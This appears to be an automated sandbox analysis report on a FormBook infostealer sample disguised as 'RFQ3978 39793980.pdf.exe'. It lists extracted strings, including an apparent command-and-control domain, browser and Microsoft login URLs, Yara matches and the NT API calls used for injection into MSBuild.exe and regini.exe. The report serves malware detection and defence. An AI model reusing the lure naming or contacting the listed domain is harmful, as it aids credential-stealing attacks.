77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: shazRxxmQwU.exe, 00000008.00000002.3560408446.0000000001287000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.elitevibes.top
                Source: shazRxxmQwU.exe, 00000008.00000002.3560408446.0000000001287000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.elitevibes.top/a5zo/
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081668749.0000000005184000.00000004.00000020.00020000.00000000.sdmp, RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 00000007.00000002.3561717968.0000000003F2E000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.0000000003D3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: regini.exe, 00000007.00000002.3561717968.0000000003F2E000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.0000000003D3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 00000007.00000003.2537937044.00000000075E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3560408446.0000000001230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3561019858.00000000039F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2354528034.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: RFQ3978 39793980.pdf.exe
                Source: initial sampleStatic PE information: Filename: RFQ3978 39793980.pdf.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0042C843 NtClose,5_2_0042C843
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152B60 NtClose,LdrInitializeThunk,5_2_01152B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01152DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01152C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011535C0 NtCreateMutant,LdrInitializeThunk,5_2_011535C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01154340 NtSetContextThread,5_2_01154340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01154650 NtSuspendThread,5_2_01154650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152B80 NtQueryInformationFile,5_2_01152B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152BA0 NtEnumerateValueKey,5_2_01152BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152BF0 NtAllocateVirtualMemory,5_2_01152BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152BE0 NtQueryValueKey,5_2_01152BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152AB0 NtWaitForSingleObject,5_2_01152AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152AD0 NtReadFile,5_2_01152AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152AF0 NtWriteFile,5_2_01152AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152D10 NtMapViewOfSection,5_2_01152D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152D00 NtSetInformationFile,5_2_01152D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152D30 NtUnmapViewOfSection,5_2_01152D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152DB0 NtEnumerateKey,5_2_01152DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152DD0 NtDelayExecution,5_2_01152DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152C00 NtQueryInformationProcess,5_2_01152C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152C60 NtCreateKey,5_2_01152C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152CA0 NtQueryInformationToken,5_2_01152CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152CC0 NtQueryVirtualMemory,5_2_01152CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152CF0 NtOpenProcess,5_2_01152CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152F30 NtCreateSection,5_2_01152F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152F60 NtCreateProcessEx,5_2_01152F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152F90 NtProtectVirtualMemory,5_2_01152F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152FB0 NtResumeThread,5_2_01152FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152FA0 NtQuerySection,5_2_01152FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152FE0 NtCreateFile,5_2_01152FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152E30 NtWriteVirtualMemory,5_2_01152E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152E80 NtReadVirtualMemory,5_2_01152E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152EA0 NtAdjustPrivilegesToken,5_2_01152EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152EE0 NtQueueApcThread,5_2_01152EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01153010 NtOpenDirectoryObject,5_2_01153010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01153090 NtSetValueKey,5_2_01153090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011539B0 NtGetContextThread,5_2_011539B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01153D10 NtOpenProcessToken,5_2_01153D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01153D70 NtOpenThread,5_2_01153D70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB4340 NtSetContextThread,LdrInitializeThunk,7_2_02DB4340
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB4650 NtSuspendThread,LdrInitializeThunk,7_2_02DB4650
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2AD0 NtReadFile,LdrInitializeThunk,7_2_02DB2AD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2AF0 NtWriteFile,LdrInitializeThunk,7_2_02DB2AF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02DB2BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02DB2BE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02DB2BA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2B60 NtClose,LdrInitializeThunk,7_2_02DB2B60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02DB2EE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02DB2E80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2FE0 NtCreateFile,LdrInitializeThunk,7_2_02DB2FE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2FB0 NtResumeThread,LdrInitializeThunk,7_2_02DB2FB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2F30 NtCreateSection,LdrInitializeThunk,7_2_02DB2F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02DB2CA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02DB2C70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2C60 NtCreateKey,LdrInitializeThunk,7_2_02DB2C60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2DD0 NtDelayExecution,LdrInitializeThunk,7_2_02DB2DD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02DB2DF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02DB2D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02DB2D30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB35C0 NtCreateMutant,LdrInitializeThunk,7_2_02DB35C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB39B0 NtGetContextThread,LdrInitializeThunk,7_2_02DB39B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2AB0 NtWaitForSingleObject,7_2_02DB2AB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2B80 NtQueryInformationFile,7_2_02DB2B80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2EA0 NtAdjustPrivilegesToken,7_2_02DB2EA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2E30 NtWriteVirtualMemory,7_2_02DB2E30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2F90 NtProtectVirtualMemory,7_2_02DB2F90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2FA0 NtQuerySection,7_2_02DB2FA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2F60 NtCreateProcessEx,7_2_02DB2F60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2CC0 NtQueryVirtualMemory,7_2_02DB2CC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2CF0 NtOpenProcess,7_2_02DB2CF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2C00 NtQueryInformationProcess,7_2_02DB2C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2DB0 NtEnumerateKey,7_2_02DB2DB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB2D00 NtSetInformationFile,7_2_02DB2D00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB3090 NtSetValueKey,7_2_02DB3090
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB3010 NtOpenDirectoryObject,7_2_02DB3010
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB3D70 NtOpenThread,7_2_02DB3D70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB3D10 NtOpenProcessToken,7_2_02DB3D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004C9160 NtCreateFile,7_2_004C9160
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004C92D0 NtReadFile,7_2_004C92D0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004C93D0 NtDeleteFile,7_2_004C93D0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004C9480 NtClose,7_2_004C9480
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004C95F0 NtAllocateVirtualMemory,7_2_004C95F0
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_025BD4040_2_025BD404
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_04D46DC00_2_04D46DC0
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_04D400400_2_04D40040
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_04D4003F0_2_04D4003F
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_04D46DB30_2_04D46DB3
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_04D490710_2_04D49071
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073196C80_2_073196C8
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073180A00_2_073180A0
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07311E880_2_07311E88
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07312CF80_2_07312CF8
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07310B900_2_07310B90
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073196B80_2_073196B8
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073186980_2_07318698
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073186880_2_07318688
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_0731A5700_2_0731A570
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_0731557A0_2_0731557A
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_0731A5600_2_0731A560
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073155880_2_07315588
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073114500_2_07311450
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073114400_2_07311440
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073183580_2_07318358
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073183480_2_07318348
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073153A80_2_073153A8
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073153980_2_07315398
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073151180_2_07315118
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073151080_2_07315108
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_0731001B0_2_0731001B
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073100400_2_07310040
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073180900_2_07318090
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07314F100_2_07314F10
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07314F000_2_07314F00
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07319FBA0_2_07319FBA
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07319FC80_2_07319FC8
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07311E7A0_2_07311E7A
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07318E500_2_07318E50
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07318E400_2_07318E40
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07313D080_2_07313D08
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07312CAF0_2_07312CAF
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07312C970_2_07312C97
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07313CF80_2_07313CF8
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07310B3D0_2_07310B3D
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07310B770_2_07310B77
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07318A900_2_07318A90
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_07318A800_2_07318A80
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073118E80_2_073118E8
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_073118D90_2_073118D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_004186B35_2_004186B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0040281F5_2_0040281F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_004028205_2_00402820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0040E0D35_2_0040E0D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_004100E35_2_004100E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_004168A35_2_004168A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_004031505_2_00403150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0040E2175_2_0040E217
